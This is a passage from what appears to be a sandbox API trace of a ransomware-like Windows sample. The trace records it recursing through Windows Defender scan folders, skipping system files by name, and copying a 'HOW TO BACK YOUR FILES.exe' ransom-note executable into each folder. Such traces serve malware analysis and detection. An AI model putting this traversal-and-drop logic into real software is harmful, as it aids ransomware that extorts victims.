lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0090.562] lstrcmpiW (lpString1="History", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.562] lstrcmpiW (lpString1="History", lpString2="aoldtz.exe") returned 1 [0090.562] lstrcmpiW (lpString1="History", lpString2=".") returned 1 [0090.562] lstrcmpiW (lpString1="History", lpString2="..") returned 1 [0090.562] lstrcmpiW (lpString1="History", lpString2="windows") returned -1 [0090.562] lstrcmpiW (lpString1="History", lpString2="bootmgr") returned 1 [0090.562] lstrcmpiW (lpString1="History", lpString2="temp") returned -1 [0090.562] lstrcmpiW (lpString1="History", lpString2="pagefile.sys") returned -1 [0090.562] lstrcmpiW (lpString1="History", lpString2="boot") returned 1 [0090.562] lstrcmpiW (lpString1="History", lpString2="ids.txt") returned -1 [0090.562] lstrcmpiW (lpString1="History", lpString2="ntuser.dat") returned -1 [0090.562] lstrcmpiW (lpString1="History", lpString2="perflogs") returned -1 [0090.562] lstrcmpiW (lpString1="History", lpString2="MSBuild") returned -1 [0090.562] lstrlenW (lpString="History") returned 7 [0090.562] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\*") returned 87 [0090.562] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="History" | out: lpString1="History") returned="History" [0090.562] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0090.562] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xbc) returned 0x2cfe70 [0090.562] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7bf0 [0090.562] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c420720, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c420720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.562] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.562] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c420720, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c420720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.562] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.562] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2248 [0090.562] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History" [0090.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfe70 | out: hHeap=0x2b0000) returned 1 [0090.562] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0090.563] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History") returned 93 [0090.563] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History" [0090.563] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.563] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\scans\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.563] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.563] GetLastError () returned 0x0 [0090.563] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.563] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.563] CloseHandle (hObject=0x120) returned 1 [0090.563] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.564] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.564] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.564] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.564] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.564] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.564] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.564] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.564] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.564] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.564] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.564] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76b24d28, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x63776f20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63776f20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CacheManager", cAlternateFileName="CACHEM~1")) returned 1 [0090.564] lstrcmpiW (lpString1="CacheManager", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.564] lstrcmpiW (lpString1="CacheManager", lpString2="aoldtz.exe") returned 1 [0090.564] lstrcmpiW (lpString1="CacheManager", lpString2=".") returned 1 [0090.564] lstrcmpiW (lpString1="CacheManager", lpString2="..") returned 1 [0090.564] lstrcmpiW (lpString1="CacheManager", lpString2="windows") returned -1 [0090.564] lstrcmpiW (lpString1="CacheManager", lpString2="bootmgr") returned 1 [0090.564] lstrcmpiW (lpString1="CacheManager", lpString2="temp") returned -1 [0090.564] lstrcmpiW (lpString1="CacheManager", lpString2="pagefile.sys") returned -1 [0090.564] lstrcmpiW (lpString1="CacheManager", lpString2="boot") returned 1 [0090.564] lstrcmpiW (lpString1="CacheManager", lpString2="ids.txt") returned -1 [0090.564] lstrcmpiW (lpString1="CacheManager", lpString2="ntuser.dat") returned -1 [0090.564] lstrcmpiW (lpString1="CacheManager", lpString2="perflogs") returned -1 [0090.564] lstrcmpiW (lpString1="CacheManager", lpString2="MSBuild") returned -1 [0090.564] lstrlenW (lpString="CacheManager") returned 12 [0090.564] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\*") returned 95 [0090.564] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="CacheManager" | out: lpString1="CacheManager") returned="CacheManager" [0090.564] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0090.564] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd6) returned 0x2d6cf0 [0090.564] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7bf0 [0090.564] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c420720, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c420720, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.565] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.565] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Results", cAlternateFileName="")) returned 1 [0090.565] lstrcmpiW (lpString1="Results", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.565] lstrcmpiW (lpString1="Results", lpString2="aoldtz.exe") returned 1 [0090.565] lstrcmpiW (lpString1="Results", lpString2=".") returned 1 [0090.565] lstrcmpiW (lpString1="Results", lpString2="..") returned 1 [0090.565] lstrcmpiW (lpString1="Results", lpString2="windows") returned -1 [0090.565] lstrcmpiW (lpString1="Results", lpString2="bootmgr") returned 1 [0090.565] lstrcmpiW (lpString1="Results", lpString2="temp") returned -1 [0090.565] lstrcmpiW (lpString1="Results", lpString2="pagefile.sys") returned 1 [0090.565] lstrcmpiW (lpString1="Results", lpString2="boot") returned 1 [0090.565] lstrcmpiW (lpString1="Results", lpString2="ids.txt") returned 1 [0090.565] lstrcmpiW (lpString1="Results", lpString2="ntuser.dat") returned 1 [0090.565] lstrcmpiW (lpString1="Results", lpString2="perflogs") returned 1 [0090.565] lstrcmpiW (lpString1="Results", lpString2="MSBuild") returned 1 [0090.565] lstrlenW (lpString="Results") returned 7 [0090.565] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned 106 [0090.565] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="Results" | out: lpString1="Results") returned="Results" [0090.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2580 [0090.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xcc) returned 0x2d40a8 [0090.565] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2588 | out: ListHead=0x2e7710, ListEntry=0x2d2588) returned 0x2d2248 [0090.565] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x769ce0c6, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x63750dc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x63750dc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Service", cAlternateFileName="")) returned 1 [0090.565] lstrcmpiW (lpString1="Service", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.565] lstrcmpiW (lpString1="Service", lpString2="aoldtz.exe") returned 1 [0090.565] lstrcmpiW (lpString1="Service", lpString2=".") returned 1 [0090.565] lstrcmpiW (lpString1="Service", lpString2="..") returned 1 [0090.565] lstrcmpiW (lpString1="Service", lpString2="windows") returned -1 [0090.565] lstrcmpiW (lpString1="Service", lpString2="bootmgr") returned 1 [0090.565] lstrcmpiW (lpString1="Service", lpString2="temp") returned -1 [0090.565] lstrcmpiW (lpString1="Service", lpString2="pagefile.sys") returned 1 [0090.565] lstrcmpiW (lpString1="Service", lpString2="boot") returned 1 [0090.565] lstrcmpiW (lpString1="Service", lpString2="ids.txt") returned 1 [0090.565] lstrcmpiW (lpString1="Service", lpString2="ntuser.dat") returned 1 [0090.565] lstrcmpiW (lpString1="Service", lpString2="perflogs") returned 1 [0090.565] lstrcmpiW (lpString1="Service", lpString2="MSBuild") returned 1 [0090.565] lstrlenW (lpString="Service") returned 7 [0090.565] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Results") returned 101 [0090.566] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="Service" | out: lpString1="Service") returned="Service" [0090.566] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2560 [0090.566] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xcc) returned 0x2d4180 [0090.566] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2568 | out: ListHead=0x2e7710, ListEntry=0x2d2568) returned 0x2d2588 [0090.566] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Store", cAlternateFileName="")) returned 1 [0090.566] lstrcmpiW (lpString1="Store", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.566] lstrcmpiW (lpString1="Store", lpString2="aoldtz.exe") returned 1 [0090.566] lstrcmpiW (lpString1="Store", lpString2=".") returned 1 [0090.566] lstrcmpiW (lpString1="Store", lpString2="..") returned 1 [0090.566] lstrcmpiW (lpString1="Store", lpString2="windows") returned -1 [0090.566] lstrcmpiW (lpString1="Store", lpString2="bootmgr") returned 1 [0090.566] lstrcmpiW (lpString1="Store", lpString2="temp") returned -1 [0090.566] lstrcmpiW (lpString1="Store", lpString2="pagefile.sys") returned 1 [0090.566] lstrcmpiW (lpString1="Store", lpString2="boot") returned 1 [0090.566] lstrcmpiW (lpString1="Store", lpString2="ids.txt") returned 1 [0090.566] lstrcmpiW (lpString1="Store", lpString2="ntuser.dat") returned 1 [0090.566] lstrcmpiW (lpString1="Store", lpString2="perflogs") returned 1 [0090.566] lstrcmpiW (lpString1="Store", lpString2="MSBuild") returned 1 [0090.566] lstrlenW (lpString="Store") returned 5 [0090.566] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned 101 [0090.566] lstrcpyW (in: lpString1=0x2cce4bc, lpString2="Store" | out: lpString1="Store") returned="Store" [0090.566] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d25e0 [0090.566] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc8) returned 0x2d6dd0 [0090.566] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d25e8 | out: ListHead=0x2e7710, ListEntry=0x2d25e8) returned 0x2d2568 [0090.566] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Store", cAlternateFileName="")) returned 0 [0090.566] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.566] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d25e8 [0090.566] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store" [0090.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6dd0 | out: hHeap=0x2b0000) returned 1 [0090.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0090.566] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned 99 [0090.566] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store" [0090.566] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.566] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\scans\\history\\store\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.567] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.567] GetLastError () returned 0x0 [0090.567] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.567] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.567] CloseHandle (hObject=0x120) returned 1 [0090.567] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.567] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.567] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Store\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.569] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.569] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.569] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0090.569] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c46c9e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.569] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.569] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0090.569] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0090.569] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0090.569] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c46c9e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.569] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.569] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c46c9e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c46c9e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.569] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.569] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2568 [0090.569] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service" [0090.569] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4180 | out: hHeap=0x2b0000) returned 1 [0090.569] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2560 | out: hHeap=0x2b0000) returned 1 [0090.569] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned 101 [0090.569] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service" [0090.569] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.569] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows defender\\scans\\history\\service\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.570] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.570] GetLastError () returned 0x0 [0090.570] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.570] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.570] CloseHandle (hObject=0x120) returned 1 [0090.570] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.570] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.570] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, 